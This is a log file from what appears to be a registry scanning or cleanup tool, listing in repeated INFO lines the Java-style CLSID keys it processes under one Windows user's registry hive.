[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0020-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0020-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0021-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0021-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0000-0000-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0000-0000-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0000-0001-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0000-0001-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0000-0002-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0000-0002-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0000-0003-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0000-0003-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0000-0004-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0000-0004-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0000-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0000-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0001-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0001-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0002-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0002-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0003-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0003-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0004-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0004-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0005-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0005-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0006-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0006-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0007-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0007-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0000-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0000-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0001-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0001-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0002-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0002-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0003-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0003-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0004-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0004-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0005-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0005-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0006-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0006-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0007-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0007-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0008-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0008-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0009-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0009-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0010-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0010-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0011-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0011-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0012-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0012-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0013-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0013-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0014-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0014-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0015-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0015-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0016-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0016-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0017-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0017-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0018-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0018-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0019-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0019-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0020-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0020-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0021-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0021-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0022-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0022-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0023-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0023-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0024-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0024-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0025-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0025-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0026-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0026-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0027-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0027-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0028-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0028-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0029-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0029-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0030-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0030-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0031-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0031-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0032-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0032-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0033-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0033-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0034-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0034-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0035-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0035-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0036-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0036-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0037-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0037-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0038-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0038-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0039-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0039-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0040-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0040-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0041-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0041-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0042-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0042-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0043-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0043-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-FFFF-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0000-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0000-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0000-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0001-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0001-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0001-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0002-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0002-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0002-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0003-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0003-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0003-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0004-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0004-ABCDEFFEDCBB}]
